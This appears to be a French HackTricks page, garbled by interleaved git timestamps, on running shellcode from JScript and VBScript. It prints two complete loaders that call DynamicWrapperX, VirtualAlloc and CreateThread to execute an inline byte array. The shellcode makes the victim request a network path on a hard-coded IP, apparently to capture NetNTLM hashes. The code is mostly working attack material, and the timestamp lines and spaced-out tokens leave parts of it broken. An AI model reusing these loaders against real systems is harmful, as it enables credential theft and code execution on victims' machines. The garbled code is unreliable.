[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html ](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html )\
2024-01-09 14:32:10 +00:00
Sur cette base, j'ai porté le shellcode en JS et VBS. La partie intéressante est que nous pouvons intégrer du shellcode dans JScript ou VBScript à l'intérieur de formats html et .hta.\
Notez que le shellcode suivant est dirigé vers mon IP.
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
#### JScript
```javascript
2020-07-15 15:43:14 +00:00
/*
2024-01-09 14:32:10 +00:00
* Author : Osanda Malith Jayathissa (@OsandaMalith )
* Title: Shellcode to request a non-existing network path
* Website: https://osandamalith.com
* Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
* Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
*/
DX = new ActiveXObject("DynamicWrapperX");
2020-07-15 15:43:14 +00:00
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
var MEM_COMMIT = 0x1000;
var PAGE_EXECUTE_READWRITE = 0x40;
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
var sc = [
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa,
0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0,
0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05,
0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e,
0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d,
0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b,
0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1,
0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b,
0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c,
0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b,
0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18,
0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c,
0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75,
0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7,
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
2021-01-06 00:08:54 +00:00
2024-01-09 14:32:10 +00:00
var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
2020-07-15 15:43:14 +00:00
for(var i = 0; i < sc.length ; i + + ) DX . NumPut ( sc [ i ] , scLocation , i ) ;
var thread = DX.CreateThread(0,0,scLocation,0,0);
```
2023-06-03 13:10:46 +00:00
#### VBScript
2022-07-11 08:44:04 +00:00
```vba
2020-07-15 15:43:14 +00:00
' Author : Osanda Malith Jayathissa (@OsandaMalith )
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith.com
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Const MEM_COMMIT = & H1000
Const PAGE_EXECUTE_READWRITE = & H40
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
shellcode = Array( _
& He8, & Hff, & Hff, & Hff, & Hff, & Hc0, & H5f, & Hb9, & H55, & H03, & H02, & H02, & H81, & Hf1, & H02, & H02, & H02, & H02, & H83, & Hc7, _
& H1d, & H33, & Hf6, & Hfc, & H8a, & H07, & H3c, & H05, & H0f, & H44, & Hc6, & Haa, & He2, & Hf6, & He8, & H05, & H05, & H05, & H05, & H5e, _
& H8b, & Hfe, & H81, & Hc6, & H29, & H01, & H05, & H05, & Hb9, & H02, & H05, & H05, & H05, & Hfc, & Had, & H01, & H3c, & H07, & He2, & Hfa, _
2024-01-09 14:32:10 +00:00
& H56, & Hb9, & H8d, & H10, & Hb7, & Hf8, & He8, & H5f, & H05, & H05, & H05, & H68, & H31, & H01, & H05, & H05, & Hff, & Hd0, & Hb9, & He0, _
2020-07-15 15:43:14 +00:00
& H53, & H31, & H4b, & He8, & H4e, & H05, & H05, & H05, & Hb9, & Hac, & Hd5, & Haa, & H88, & H8b, & Hf0, & He8, & H42, & H05, & H05, & H05, _
& H6a, & H05, & H68, & H80, & H05, & H05, & H05, & H6a, & H03, & H6a, & H05, & H6a, & H01, & H68, & H05, & H05, & H05, & H80, & H68, & H3e, _
& H01, & H05, & H05, & Hff, & Hd0, & H6a, & H05, & Hff, & Hd6, & H33, & Hc0, & H5e, & Hc3, & H33, & Hd2, & Heb, & H10, & Hc1, & Hca, & H0d, _
& H3c, & H61, & H0f, & Hbe, & Hc0, & H7c, & H03, & H83, & He8, & H20, & H03, & Hd0, & H41, & H8a, & H01, & H84, & Hc0, & H75, & Hea, & H8b, _
& Hc2, & Hc3, & H8d, & H41, & Hf8, & Hc3, & H55, & H8b, & Hec, & H83, & Hec, & H14, & H53, & H56, & H57, & H89, & H4d, & Hf4, & H64, & Ha1, _
& H30, & H05, & H05, & H05, & H89, & H45, & Hfc, & H8b, & H45, & Hfc, & H8b, & H40, & H0c, & H8b, & H40, & H14, & H89, & H45, & Hec, & H8b, _
2024-01-09 14:32:10 +00:00
& Hf8, & H8b, & Hcf, & He8, & Hd2, & Hff, & Hff, & Hff, & H8b, & H70, & H18, & H8b, & H3f, & H85, & Hf6, & H74, & H4f, & H8b, & H46, & H3c, _
2020-07-15 15:43:14 +00:00
& H8b, & H5c, & H30, & H78, & H85, & Hdb, & H74, & H44, & H8b, & H4c, & H33, & H0c, & H03, & Hce, & He8, & H96, & Hff, & Hff, & Hff, & H8b, _
& H4c, & H33, & H20, & H89, & H45, & Hf8, & H33, & Hc0, & H03, & Hce, & H89, & H4d, & Hf0, & H89, & H45, & Hfc, & H39, & H44, & H33, & H18, _
& H76, & H22, & H8b, & H0c, & H81, & H03, & Hce, & He8, & H75, & Hff, & Hff, & Hff, & H03, & H45, & Hf8, & H39, & H45, & Hf4, & H74, & H1c, _
& H8b, & H45, & Hfc, & H8b, & H4d, & Hf0, & H40, & H89, & H45, & Hfc, & H3b, & H44, & H33, & H18, & H72, & Hde, & H3b, & H7d, & Hec, & H75, _
& H9c, & H33, & Hc0, & H5f, & H5e, & H5b, & Hc9, & Hc3, & H8b, & H4d, & Hfc, & H8b, & H44, & H33, & H24, & H8d, & H04, & H48, & H0f, & Hb7, _
& H0c, & H30, & H8b, & H44, & H33, & H1c, & H8d, & H04, & H88, & H8b, & H04, & H30, & H03, & Hc6, & Heb, & Hdf, & H21, & H05, & H05, & H05, _
& H50, & H05, & H05, & H05, & H6b, & H65, & H72, & H6e, & H65, & H6c, & H33, & H32, & H2e, & H64, & H6c, & H6c, & H05, & H2f, & H2f, & H33, _
& H35, & H2e, & H31, & H36, & H34, & H2e, & H31, & H35, & H33, & H2e, & H32, & H32, & H34, & H2f, & H61, & H61, & H05)
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
For i =LBound(shellcode) to UBound(shellcode)
2024-01-09 14:32:10 +00:00
DX.NumPut shellcode(i),scLocation,i
2020-07-15 15:43:14 +00:00
Next
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
thread = DX.CreateThread (0,0,scLocation,0,0)
```
2024-01-09 14:32:10 +00:00
```markdown
2020-07-15 15:43:14 +00:00
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs ](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs )
2024-01-09 14:32:10 +00:00
Il pourrait y avoir bien d'autres méthodes dans Windows. On ne sait jamais ! 🙂
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Références
2020-07-15 15:43:14 +00:00
2022-04-05 18:24:52 -04:00
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/** ](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ )
2020-12-23 00:17:28 +00:00
* [https://attack.mitre.org/techniques/T1187/ ](https://attack.mitre.org/techniques/T1187/ )
2020-07-15 15:43:14 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-01-09 14:32:10 +00:00
< summary > < strong > Apprenez le hacking AWS de zéro à héros avec< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:32:10 +00:00
Autres moyens de soutenir HackTricks :
2022-04-28 16:01:33 +00:00
2024-01-09 14:32:10 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** , consultez les [**PLANS D'ABONNEMENT** ](https://github.com/sponsors/carlospolop )!
* Obtenez le [**merchandising officiel PEASS & HackTricks** ](https://peass.creator-spring.com )
* Découvrez [**La Famille PEASS** ](https://opensea.io/collection/the-peass-family ), notre collection d'[**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusifs
* **Rejoignez le** 💬 [**groupe Discord** ](https://discord.gg/hRep4RUj7f ) ou le [**groupe telegram** ](https://t.me/peass ) ou **suivez** -moi sur **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) et [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-01-09 14:32:10 +00:00
```